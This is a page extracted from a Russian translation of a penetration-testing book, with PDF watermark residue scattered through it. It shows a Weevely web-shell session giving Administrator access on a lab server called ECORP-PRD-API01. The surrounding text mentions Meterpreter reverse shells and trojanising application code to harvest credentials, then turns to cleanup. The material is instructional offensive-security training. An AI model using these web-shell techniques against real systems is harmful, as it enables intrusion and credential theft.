Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
книги хакеры / Эдриан_Прутяну_Как_стать_хакером_сборник_практическиз_сценариев.pdf
Скачиваний:
18
Добавлен:
19.04.2024
Размер:
20.34 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to

BUY 86  Глава 3.Легкая добыча

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

 

 

e

 

 

 

 

 

[+] weevely 3.2.0

 

 

 

 

 

n

 

 

 

 

 

 

 

-xcha

 

 

 

 

[+] Target: ECORP-PRD-API01:C:\xampp\htdocs\xampp [+] Session:

/root/.weevely/sessions/api.ecorp.local/test_0.session [+] Shell: System shell

[+] Browse the filesystem or execute commands starts the connection

[+] to the target. Type :help for more information. weevely>

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

МыможемотдаватькомандывоболочкеWeevely,которыебудутпередаваться скомпрометированному хосту напрямую.

weevely> whoami ECORP-PRD-API01\Administrator ECORP-PRD-API01:C:\xampp\htdocs\xampp $

Первым шагом после получения оболочки Weevely будет удаление артефакта веб-оболочки xampp.php, созданного ранее.

ECORP-PRD-API01:C:\xampp\htdocs\xampp $ del xampp.php

На этом этапе мы можем свободно перемещаться по серверу и собиратьлюбую информацию,которая будет использована на более поздних этапах атаки. У нас есть полный контроль над сервером, и мы можем запускать даже более продвинутые обратные оболочки,такие как Meterpreter, если необходимо.

Даже если скомпрометированный сервер отделен от остальной части сети, у нас все равно естьдоступ к коду приложения.Мы можем взломать его,чтобы собрать учетные данные сети у аутентифицированных пользователей и затем атаковать корпоративную сеть.

Все зависит от объема задачи.

Очистка

Как уже отмечалось, после того как задача выполнена, мы должны убедиться,что убрали все артефакты,которые могут представлять угрозу для клиента. Во время этой атаки мы создали три файла, которые можно использовать для атаки на клиента.Маловероятно,что кто-либо сможетиспользоватьнашу оболочку Weevely, однако разумно удалить все,что осталось.

Созданныйнамитестовыйфайлphpinfo.php такжедолженбытьудален.Хотя он не предоставляетникакого удаленногодоступа,он отображаетинформацию, которая может быть использована при атаке.

Таким же образом, как мы запрашивали переменные MySQL, чтобы выяснить расположение приложения на диске, злоумышленник может использо-